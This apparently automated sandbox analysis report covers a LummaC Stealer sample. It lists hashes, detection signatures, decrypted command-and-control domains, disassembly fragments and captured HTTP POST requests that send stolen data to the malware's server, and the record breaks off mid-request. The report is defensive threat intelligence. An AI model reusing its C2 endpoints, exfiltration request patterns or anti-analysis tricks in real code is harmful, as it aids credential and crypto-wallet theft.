Windows Analysis Report
JqGBbm7.exe

Overview

General Information

Sample name:JqGBbm7.exe
Analysis ID:1629893
MD5:30c1a6337089e68b975438caebc8f497
SHA1:2cf2324672cf72b9bc1869633f3bf6904bb61011
SHA256:db15e9537c66a283d59f45e262018c45ef3fc5416b292b2c5269f4f9a4f10017
Tags:176-113-115-7exeuser-JAMESWT_MHT

Detection

LummaC Stealer
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Joe Sandbox ML detected suspicious sample
PE file contains section with special chars
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Detected potential crypto function
Entry point lies outside standard sections
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • JqGBbm7.exe (PID: 7280 cmdline: "C:\Users\user\Desktop\JqGBbm7.exe" MD5: 30C1A6337089E68B975438CAEBC8F497)
  • cleanup
Malware configuration: {"C2 url": "https://explorebieology.run/api", "Build Version": "1vJIvk--mix"}
Yara matches (network dumps)

Source | Rule | Description | Author
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security

Yara matches (memory dumps)

Source | Rule | Description | Author
00000000.00000003.1759629623.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000003.1770818531.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Process Memory Space: JqGBbm7.exe PID: 7280 | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
Process Memory Space: JqGBbm7.exe PID: 7280 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Process Memory Space: JqGBbm7.exe PID: 7280 | JoeSecurity_LummaCStealer | Yara detected LummaC Stealer | Joe Security

No Sigma rule has matched
Suricata IDS alerts

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-05T09:14:09.073658+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49733 | 104.21.31.208 | 443 | TCP
2025-03-05T09:14:10.196038+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49734 | 104.21.31.208 | 443 | TCP
2025-03-05T09:14:11.400800+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49735 | 104.21.31.208 | 443 | TCP
2025-03-05T09:14:13.016025+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49736 | 104.21.31.208 | 443 | TCP
2025-03-05T09:14:14.404589+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49737 | 104.21.31.208 | 443 | TCP
2025-03-05T09:14:16.201598+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49738 | 104.21.31.208 | 443 | TCP
2025-03-05T09:14:17.725240+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49739 | 104.21.31.208 | 443 | TCP
2025-03-05T09:14:19.835558+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49740 | 104.21.31.208 | 443 | TCP
2025-03-05T09:14:09.533603+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49733 | 104.21.31.208 | 443 | TCP
2025-03-05T09:14:10.677834+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49734 | 104.21.31.208 | 443 | TCP
2025-03-05T09:14:20.275524+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49740 | 104.21.31.208 | 443 | TCP
2025-03-05T09:14:09.533603+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.4 | 49733 | 104.21.31.208 | 443 | TCP
2025-03-05T09:14:09.073658+0100 | 2060537 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49733 | 104.21.31.208 | 443 | TCP
2025-03-05T09:14:10.196038+0100 | 2060537 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49734 | 104.21.31.208 | 443 | TCP
2025-03-05T09:14:11.400800+0100 | 2060537 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49735 | 104.21.31.208 | 443 | TCP
2025-03-05T09:14:13.016025+0100 | 2060537 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49736 | 104.21.31.208 | 443 | TCP
2025-03-05T09:14:14.404589+0100 | 2060537 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49737 | 104.21.31.208 | 443 | TCP
2025-03-05T09:14:16.201598+0100 | 2060537 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49738 | 104.21.31.208 | 443 | TCP
2025-03-05T09:14:17.725240+0100 | 2060537 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49739 | 104.21.31.208 | 443 | TCP
2025-03-05T09:14:19.835558+0100 | 2060537 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49740 | 104.21.31.208 | 443 | TCP
2025-03-05T09:14:08.569261+0100 | 2060536 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 56573 | 1.1.1.1 | 53 | UDP
2025-03-05T09:14:08.552721+0100 | 2060538 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 58036 | 1.1.1.1 | 53 | UDP
2025-03-05T09:14:16.711841+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49738 | 104.21.31.208 | 443 | TCP
2025-03-05T09:14:17.732437+0100 | 2843864 | 1 | A Network Trojan was detected | 192.168.2.4 | 49739 | 104.21.31.208 | 443 | TCP

                AV Detection

Source: JqGBbm7.exe | Avira: detected
Source: JqGBbm7.exe.7280.0.memstrmin | Malware Configuration Extractor: LummaC {"C2 url": "https://explorebieology.run/api", "Build Version": "1vJIvk--mix"}
Source: JqGBbm7.exe | Virustotal: Detection: 69%
Source: JqGBbm7.exe | ReversingLabs: Detection: 73%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: 00000000.00000002.1806831193.00000000009C1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: gadgethgfub.icu
Source: 00000000.00000002.1806831193.00000000009C1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: explorebieology.run
Source: 00000000.00000002.1806831193.00000000009C1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: moderzysics.top
Source: 00000000.00000002.1806831193.00000000009C1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: techmindzs.live
Source: 00000000.00000002.1806831193.00000000009C1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: codxefusion.top
Source: 00000000.00000002.1806831193.00000000009C1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: phygcsforum.life
Source: 00000000.00000002.1806831193.00000000009C1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: techspherxe.top
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 0_2_009DBFAA CryptUnprotectData | 0_2_009DBFAA
Source: JqGBbm7.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.31.208:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.31.208:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.31.208:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.31.208:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.31.208:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.31.208:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.31.208:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.31.208:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then cmp dword ptr [ebp+edi*8+00h], CA198B66h | 0_2_00A0A030
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], C0F3A0E1h | 0_2_00A0C1C6
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], 6D58C181h | 0_2_00A06170
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then cmp word ptr [edi+ebx], 0000h | 0_2_00A0E420
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax+1D56B138h] | 0_2_00A0E550
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then mov ebp, edx | 0_2_00A0E550
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then mov byte ptr [eax], cl | 0_2_009D284C
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then mov byte ptr [eax], cl | 0_2_009D284C
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then movzx edi, byte ptr [edx+ecx+15B2AB34h] | 0_2_009D284C
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then movzx edx, byte ptr [esp+ecx+1Ch] | 0_2_009F8C5C
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then lea ecx, dword ptr [eax+2D321BFEh] | 0_2_009D3183
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax-62h] | 0_2_009F12E0
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then movzx ebx, byte ptr [esp+edi-004F7DAAh] | 0_2_00A0F630
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then mov word ptr [ecx], dx | 0_2_00A0F630
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then movzx edi, byte ptr [esp+ecx+10h] | 0_2_00A0F870
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then mov word ptr [ecx], dx | 0_2_00A0F870
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then movzx edx, byte ptr [ebx+ecx-014B2F66h] | 0_2_009CFAE9
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax+1D56B138h] | 0_2_00A0FBA0
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then mov byte ptr [esi], al | 0_2_009F7B25
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then mov byte ptr [esi], cl | 0_2_009F7B25
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then mov esi, eax | 0_2_009DBFAA
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax] | 0_2_00A08032
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then movzx eax, byte ptr [edx+esi-444800C2h] | 0_2_009F0042
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then mov byte ptr [esi], al | 0_2_009F81B4
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then mov byte ptr [esi], cl | 0_2_009F81B4
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h | 0_2_009EA2B0
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h] | 0_2_009CA220
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then movzx ecx, word ptr [edi+esi*4] | 0_2_009CA220
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then push 00000000h | 0_2_009F039F
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then movzx edx, byte ptr [eax+ecx] | 0_2_009F43D0
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then movzx ebx, byte ptr [eax+edx] | 0_2_009E6370
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then cmp dword ptr [edx+ebx*8], 744E5843h | 0_2_00A0A580
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then jmp ecx | 0_2_009F46F0
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h | 0_2_009F46F0
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax+6AB32A06h] | 0_2_009F46F0
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax-06E9A8FEh] | 0_2_009E07F0
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax-2FBA7F80h] | 0_2_009DC74B
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax] | 0_2_00A088E3
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then mov byte ptr [esi], al | 0_2_009E28F8
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then movzx eax, byte ptr [esp+ecx-444800C2h] | 0_2_009F08F0
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h | 0_2_009F08F0
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax] | 0_2_00A0A980
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax] | 0_2_00A0A980
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then mov word ptr [ebp+00h], cx | 0_2_009EA950
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then jmp ecx | 0_2_009F4948
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then add ebp, dword ptr [esp+0Ch] | 0_2_009F6AF0
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then cmp dword ptr [edx+ecx*8], 743EDB10h | 0_2_00A0EA10
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then mov byte ptr [eax], cl | 0_2_009D2CEC
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then movzx edi, byte ptr [edx+ecx+15B2AB34h] | 0_2_009D2CEC
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then mov dword ptr [esp+2Ch], ebx | 0_2_009D0C50
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then cmp dword ptr [edx+ecx*8], 7A542AABh | 0_2_00A0ED50
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then movzx ebp, word ptr [ecx] | 0_2_00A0ED50
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then mov dword ptr [esp], edx | 0_2_009E2EFA
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then mov byte ptr [esi], cl | 0_2_009F8F93
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then mov byte ptr [esi], cl | 0_2_009F8F93
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then mov byte ptr [esi], cl | 0_2_009F8F82
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then mov byte ptr [esi], cl | 0_2_009F8F82
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then mov byte ptr [esi], cl | 0_2_009F8F44
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then mov byte ptr [esi], cl | 0_2_009F8F44
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h | 0_2_00A070E0
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax-2FBA80AFh] | 0_2_00A070E0
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h | 0_2_009F500F
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then movsx eax, byte ptr [esi+ecx] | 0_2_009DB040
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then mov byte ptr [ebx], al | 0_2_009F9063
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax-2FBA80A4h] | 0_2_009E1160
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], 64DAE379h | 0_2_009E1160
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then cmp dword ptr [edx+ecx*8], CA198B66h | 0_2_009E1160
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then mov byte ptr [esi], al | 0_2_009E2E97
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then mov byte ptr [esi], al | 0_2_009E2E97
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax-2FBA7F80h] | 0_2_009DD25F
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax-2FBA7F80h] | 0_2_009DC74B
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then cmp word ptr [esi+eax+02h], 0000h | 0_2_009E3382
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then mov edx, dword ptr [ebp-24h] | 0_2_009F3343
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then movzx esi, byte ptr [ebx+edx] | 0_2_009F3343
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then movzx ebx, byte ptr [edx] | 0_2_00A03350
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then mov dword ptr [esp+000000D0h], 00000000h | 0_2_009DD361
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then mov byte ptr [eax], cl | 0_2_009F9404
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then mov ebx, dword ptr [edi+04h] | 0_2_009F5430
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then mov edx, dword ptr [ebp-24h] | 0_2_009F3680
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then movzx esi, byte ptr [ebx+edx] | 0_2_009F3680
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax] | 0_2_00A0B6F3
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then mov ecx, dword ptr [00A18390h] | 0_2_009D37A2
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then mov byte ptr [edx], al | 0_2_009F77FA
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then movsx esi, byte ptr [ebx+eax] | 0_2_00A0D750
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then movzx ecx, byte ptr [edx+esi] | 0_2_00A0D750
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then movzx esi, byte ptr [esp+ebx-6A88C35Ch] | 0_2_00A0D750
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax+2Ch] | 0_2_009F1760
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then jmp eax | 0_2_009F1760
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h | 0_2_009F1760
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then mov byte ptr [edx], al | 0_2_009F7899
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then movzx edi, byte ptr [esp+eax-1Ah] | 0_2_00A0B88A
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then mov byte ptr [edx], al | 0_2_009F783A
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then mov dword ptr [esp+000000D0h], 00000000h | 0_2_009DD91E
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then movsx esi, byte ptr [ebx+eax] | 0_2_00A0DAF0
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then movzx ecx, byte ptr [edx+esi] | 0_2_00A0DAF0
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then movzx esi, byte ptr [esp+ebx-6A88C35Ch] | 0_2_00A0DAF0
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax-2FBA80AFh] | 0_2_00A07A40
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h | 0_2_009E9CE0
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax+1D56B138h] | 0_2_00A0FD60
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then mov byte ptr [esi], cl | 0_2_009F9E9A
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then mov byte ptr [esi], cl | 0_2_009F9E9A
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then movzx ebp, byte ptr [esp+ecx] | 0_2_009CBEA0
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then mov word ptr [eax], cx | 0_2_009F3E60
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then movzx esi, byte ptr [esp+ebx-6A88C35Ch] | 0_2_00A0DF90
Source: C:\Users\user\Desktop\JqGBbm7.exe | Code function: 4x nop then mov byte ptr [ecx], dl | 0_2_009DDF2A

                Networking

Source: Network traffic | Suricata IDS: 2060538 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (gadgethgfub .icu) : 192.168.2.4:58036 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2060536 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (explorebieology .run) : 192.168.2.4:56573 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2060537 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (explorebieology .run in TLS SNI) : 192.168.2.4:49734 -> 104.21.31.208:443
Source: Network traffic | Suricata IDS: 2060537 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (explorebieology .run in TLS SNI) : 192.168.2.4:49737 -> 104.21.31.208:443
Source: Network traffic | Suricata IDS: 2060537 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (explorebieology .run in TLS SNI) : 192.168.2.4:49740 -> 104.21.31.208:443
Source: Network traffic | Suricata IDS: 2060537 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (explorebieology .run in TLS SNI) : 192.168.2.4:49736 -> 104.21.31.208:443
Source: Network traffic | Suricata IDS: 2060537 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (explorebieology .run in TLS SNI) : 192.168.2.4:49739 -> 104.21.31.208:443
Source: Network traffic | Suricata IDS: 2060537 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (explorebieology .run in TLS SNI) : 192.168.2.4:49733 -> 104.21.31.208:443
Source: Network traffic | Suricata IDS: 2060537 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (explorebieology .run in TLS SNI) : 192.168.2.4:49738 -> 104.21.31.208:443
Source: Network traffic | Suricata IDS: 2060537 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (explorebieology .run in TLS SNI) : 192.168.2.4:49735 -> 104.21.31.208:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49733 -> 104.21.31.208:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49733 -> 104.21.31.208:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49740 -> 104.21.31.208:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49738 -> 104.21.31.208:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49734 -> 104.21.31.208:443
Source: Network traffic | Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:49739 -> 104.21.31.208:443
Source: Malware configuration extractor | URLs: https://explorebieology.run/api
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 104.21.31.208:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 104.21.31.208:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49740 -> 104.21.31.208:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 104.21.31.208:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 104.21.31.208:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49738 -> 104.21.31.208:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49736 -> 104.21.31.208:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 104.21.31.208:443
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: explorebieology.run
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Cookie: __cf_mw_byp=jbHAwUcAdytIGQtFfN58sTgYZjo1qwz1caz7LgJSFBs-1741162449-0.0.1.1-/api
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 55
    Host: explorebieology.run
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=XP2FTWXZX62T3ES
    Cookie: __cf_mw_byp=jbHAwUcAdytIGQtFfN58sTgYZjo1qwz1caz7LgJSFBs-1741162449-0.0.1.1-/api
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 18154
    Host: explorebieology.run
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=SD83XGQ5HVYPN1T
